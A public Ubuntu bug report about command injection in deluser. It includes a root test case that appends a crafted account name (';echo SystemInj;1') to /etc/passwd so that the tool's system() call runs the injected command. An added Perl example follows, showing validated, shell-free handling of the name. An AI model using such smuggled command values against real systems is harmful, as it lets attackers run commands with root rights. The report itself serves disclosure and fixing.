Public bug reported:

Binary package hint: adduser

/usr/sbin/deluser has a command injection bug.

Test case:
root@emanuel-desktop:/tmp# echo ";echo SystemInj;1:x:9898:9899:,,,:/home/Sysinj:/bin/bash" >> /etc/passwd
root@emanuel-desktop:/tmp# /usr/sbin/deluser ";echo SystemInj;1"
no crontab for root
SystemInj
Removing user `;echo SystemInj;1' ...
Warning: group `' has no more members.
Done.

The bug can be found at:
    if (system("crontab -l $user >/dev/null 2>&1") == 0) {

** Affects: adduser (Ubuntu)
     Importance: Undecided
         Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/782170

Title:
  command injection in deluser

-- 
ubuntu-bugs mailing list
ubuntu-bugs@lists.ubuntu.com
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
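
A shell-free form of the check quoted in the report, as an added example that is not part of the original message or of the adduser code base. The names `valid_username`, `run_quiet` and `user_has_crontab` and the account-name pattern are assumptions made for illustration; the argument order mirrors the quoted `system()` line.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumption: a conservative account-name policy (lowercase letter or '_'
# first, then letters, digits, '_' or '-', optional trailing '$').
sub valid_username {
    my ($user) = @_;
    return defined $user && $user =~ /\A[a-z_][a-z0-9_-]{0,31}\$?\z/;
}

# Run a command from an argument list and discard its output.
# exec with a list never starts /bin/sh, so ';', '|', '$()' and backticks
# inside an argument reach the program as literal bytes.
sub run_quiet {
    my @argv = @_;
    my $pid = fork();
    die "fork failed: $!" unless defined $pid;
    if ($pid == 0) {
        open STDOUT, '>', '/dev/null' or exit 127;
        open STDERR, '>', '/dev/null' or exit 127;
        exec { $argv[0] } @argv;
        exit 127;    # only reached if exec failed
    }
    waitpid $pid, 0;
    return $? >> 8;
}

# Hypothetical helper replacing the single-string system() call:
# validate first, then pass the name as its own argv element.
sub user_has_crontab {
    my ($user) = @_;
    die "refusing invalid user name\n" unless valid_username($user);
    return run_quiet('crontab', '-l', $user) == 0;
}

# Constructed input: the account name from the report's test case.
my $hostile = ';echo SystemInj;1';
my $verdict = valid_username($hostile) ? 'accepted' : 'rejected';

# Even without validation, the list form delivers the name as one argument:
# the child perl exits with the number of arguments it received.
my $argc = run_quiet($^X, '-e', 'exit scalar @ARGV', '--', $hostile);

print "valid_username: $verdict\n";            # rejected
print "arguments seen by child: $argc\n";      # 1
```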